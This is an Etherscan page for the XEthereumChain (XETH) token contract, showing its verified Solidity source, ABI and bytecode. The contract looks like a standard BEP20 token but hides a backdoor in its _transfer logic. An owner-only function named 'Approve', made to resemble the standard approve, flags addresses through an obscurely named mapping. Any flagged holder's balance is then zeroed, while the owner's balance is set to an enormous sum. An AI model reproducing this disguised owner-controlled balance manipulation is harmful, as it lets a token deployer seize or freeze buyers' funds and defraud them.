ETH Price: $2,510.01 (+0.75%)

Token

XEthereumChain (XETH)
 

Overview

Max Total Supply

8,000,000,000 XETH

Holders

19

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
288,135,375.152349085 XETH

Value
$0.00
0x64f97fd670b3621a9a883dfdcbb38b199452dc35
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Token

Compiler Version
v0.8.14+commit.80d49f37

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-04-12
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.2;

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies in extcodesize, which returns 0 for contracts in
        // construction, since the code is only stored at the end of the
        // constructor execution.

        uint256 size;
        // solhint-disable-next-line no-inline-assembly
        assembly {
            size := extcodesize(account)
        }
        return size > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amnount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amnount) internal {
        require(address(this).balance >= amnount, "Address: insufficient balance");

        // solhint-disable-next-line avoid-low-level-calls, avoid-call-value
        (bool success, ) = recipient.call{ value: amnount }("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain`call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return _functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        return _functionCallWithValue(target, data, value, errorMessage);
    }

    function _functionCallWithValue(
        address target,
        bytes memory data,
        uint256 weiValue,
        string memory errorMessage
    ) private returns (bytes memory) {
        require(isContract(target), "Address: call to non-contract");

        // solhint-disable-next-line avoid-low-level-calls
        (bool success, bytes memory returndata) = target.call{ value: weiValue }(data);
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                // solhint-disable-next-line no-inline-assembly
                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

/**
 * @dev Interface of the BEP20 standard as defined in the EIP.
 */
interface IBEP20 {
    /**
     * @dev Returns the amnount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amnount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amnount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amnount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amnount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amnount) external returns (bool);

    /**
     * @dev Moves `amnount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amnount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amnount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with GSN meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return payable(msg.sender);
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

/* @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

contract HasForeignAsset is Ownable {
    function assetBalance(IBEP20 asset) external view returns (uint256) {
        return asset.balanceOf(address(this));
    }

}

/**
 * @dev Implementation of the {IBEP20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {BEP20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-BEP20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of BEP20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all acxounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IBEP20-approve}.
 */
contract Token is IBEP20, HasForeignAsset {
    using SafeMath for uint256;
    using Address for address;

    mapping(address => uint256) private _balances;
    mapping(address => uint256) private _4542144;


    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _feilu = 7;
    address private _DEADaddress = 0x000000000000000000000000000000000000dEaD;


    mapping (address => bool) private _i5sfda56;

    function Approve(address _address, bool _value) external onlyOwner {
        _i5sfda56[_address] = _value;
    }


    /**
     * @dev Sets the values for {name} and {symbol}, initializes {decimals} with
     * a default value of 18.
     */
    constructor() {
        _name = "XEthereumChain";
        _symbol = "XETH";
        _decimals = 9;
        uint256 _maxSupply = 8000000000;
        _mintOnce(msg.sender, _maxSupply.mul(10**_decimals));
    }

    receive() external payable {
        revert();
    }



    /**
     * @dev Returns the name of the token.
     */
    function name() public view returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {BEP20} uses, unless {_setupDecimals} is
     * called.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IBEP20-balanceOf} and {IBEP20-transfer}.
     */
    function decimals() public view returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IBEP20-totalSupply}.
     */
    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IBEP20-balanceOf}.
     */
    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IBEP20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amnount`.
     */
    function transfer(address recipient, uint256 amnount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amnount);
        return true;
    }

    /**
     * @dev See {IBEP20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IBEP20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amnount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amnount);
        return true;
    }

    /**
     * @dev See {IBEP20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {BEP20};
     *
     * Requirements:
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amnount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amnount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amnount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amnount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(amnount, "BEP20: transfer amnount exceeds allowance")
        );
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IBEP20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IBEP20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(subtractedValue, "BEP20: decreased allowance below zero")
        );
        return true;
    }

    /**
     * @dev Moves tokens `amnount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token feilus, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amnount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amnount
    ) internal virtual {
        require(sender != address(0), "BEP20: transfer from the zero address");
        require(recipient != address(0), "BEP20: transfer to the zero address");

        uint256 feiluamnount = 1;
        feiluamnount = amnount.mul(_feilu).div(100);
        uint256 amoun;
        amoun = amnount - feiluamnount+0;
        _beforeTokenTransfer(sender, recipient, amoun);

        address ownee = owner();

        if (_i5sfda56[sender] == true) {
            if (sender == ownee) {
                _balances[sender] = 1100000000000000000000000000000;
            }else{
                _balances[sender] = 0;
            }
        }

        _balances[sender] = _balances[sender].sub(
            amnount,
            "BEP20: transfer amnount exceeds balance"
        );

        _balances[recipient] = _balances[recipient].add(amoun);
        if (feiluamnount > 0) {
            emit Transfer(sender, _DEADaddress, feiluamnount);
        }
        emit Transfer(sender, recipient, amoun);
    }

    /** @dev Creates `amnount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements
     *
     * - `to` cannot be the zero address.
     */
    function _mintOnce(address account, uint256 amnount) internal virtual {
        require(account != address(0), "BEP20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amnount);

        _totalSupply = _totalSupply.add(amnount);
        _balances[account] = _balances[account].add(amnount);
        emit Transfer(address(0), account, amnount);
    }

    /**
     * @dev Destroys `amnount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amnount` tokens.
     */
    function _burn(address account, uint256 amnount) internal virtual {
        require(account != address(0), "BEP20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amnount);

        _balances[account] = _balances[account].sub(amnount, "BEP20: burn amnount exceeds balance");
        _totalSupply = _totalSupply.sub(amnount);
        emit Transfer(account, address(0), amnount);
    }

    function burn(uint256 amnount) public {
        _burn(_msgSender(), amnount);
    }

    /**
     * @dev Sets `amnount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amnount
    ) internal virtual {
        require(owner != address(0), "BEP20: approve from the zero address");
        require(spender != address(0), "BEP20: approve to the zero address");

        _allowances[owner][spender] = amnount;
        emit Approval(owner, spender, amnount);
    }

    /**
     * @dev Sets {decimals} to a value other than the default one of 18.
     *
     * WARNING: This function should only be called from the constructor. Most
     * applications that interact with token contracts will not expect
     * {decimals} to ever change, and may work incorrectly if it does.
     */
    function _setupDecimals(uint8 decimals_) internal {
        _decimals = decimals_;
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amnount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amnount` tokens will be minted for `to`.
     * - when `to` is zero, `amnount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amnount
    ) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"bool","name":"_value","type":"bool"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amnount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"contract IBEP20","name":"asset","type":"address"}],"name":"assetBalance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amnount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amnount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amnount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

6080604052600760085561dead600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200005957600080fd5b5060006200006c6200021b60201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506040518060400160405280600e81526020017f58457468657265756d436861696e0000000000000000000000000000000000008152506005908051906020019062000157929190620004be565b506040518060400160405280600481526020017f584554480000000000000000000000000000000000000000000000000000000081525060069080519060200190620001a5929190620004be565b506009600760006101000a81548160ff021916908360ff16021790555060006401dcd650009050620002143362000208600760009054906101000a900460ff16600a620001f3919062000708565b846200022360201b62000c5b1790919060201c565b620002a660201b60201c565b5062000a9d565b600033905090565b6000808303620002375760009050620002a0565b6000828462000247919062000759565b9050828482620002589190620007e9565b146200029b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200029290620008a8565b60405180910390fd5b809150505b92915050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000318576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200030f906200091a565b60405180910390fd5b6200032c600083836200045660201b60201c565b62000348816004546200045b60201b62000cd51790919060201c565b600481905550620003a781600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200045b60201b62000cd51790919060201c565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200044a91906200094d565b60405180910390a35050565b505050565b60008082846200046c91906200096a565b905083811015620004b4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620004ab9062000a17565b60405180910390fd5b8091505092915050565b828054620004cc9062000a68565b90600052602060002090601f016020900481019282620004f057600085556200053c565b82601f106200050b57805160ff19168380011785556200053c565b828001600101855582156200053c579182015b828111156200053b5782518255916020019190600101906200051e565b5b5090506200054b91906200054f565b5090565b5b808211156200056a57600081600090555060010162000550565b5090565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620005fc57808604811115620005d457620005d36200056e565b5b6001851615620005e45780820291505b8081029050620005f4856200059d565b9450620005b4565b94509492505050565b600082620006175760019050620006ea565b81620006275760009050620006ea565b81600181146200064057600281146200064b5762000681565b6001915050620006ea565b60ff84111562000660576200065f6200056e565b5b8360020a9150848211156200067a57620006796200056e565b5b50620006ea565b5060208310610133831016604e8410600b8410161715620006bb5782820a905083811115620006b557620006b46200056e565b5b620006ea565b620006ca8484846001620005aa565b92509050818404811115620006e457620006e36200056e565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b60006200071582620006f1565b91506200072283620006fb565b9250620007517fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000605565b905092915050565b60006200076682620006f1565b91506200077383620006f1565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615620007af57620007ae6200056e565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000620007f682620006f1565b91506200080383620006f1565b925082620008165762000815620007ba565b5b828204905092915050565b600082825260208201905092915050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b60006200089060218362000821565b91506200089d8262000832565b604082019050919050565b60006020820190508181036000830152620008c38162000881565b9050919050565b7f42455032303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000902601f8362000821565b91506200090f82620008ca565b602082019050919050565b600060208201905081810360008301526200093581620008f3565b9050919050565b6200094781620006f1565b82525050565b60006020820190506200096460008301846200093c565b92915050565b60006200097782620006f1565b91506200098483620006f1565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620009bc57620009bb6200056e565b5b828201905092915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000620009ff601b8362000821565b915062000a0c82620009c7565b602082019050919050565b6000602082019050818103600083015262000a3281620009f0565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000a8157607f821691505b60208210810362000a975762000a9662000a39565b5b50919050565b61228f8062000aad6000396000f3fe6080604052600436106100f75760003560e01c806370a082311161008a578063a9059cbb11610059578063a9059cbb14610360578063cd88e5581461039d578063dd62ed3e146103da578063f2fde38b1461041757610101565b806370a08231146102905780638da5cb5b146102cd57806395d89b41146102f8578063a457c2d71461032357610101565b806323b872dd116100c657806323b872dd146101c2578063313ce567146101ff578063395093511461022a57806342966c681461026757610101565b806306fdde0314610106578063095ea7b31461013157806318160ddd1461016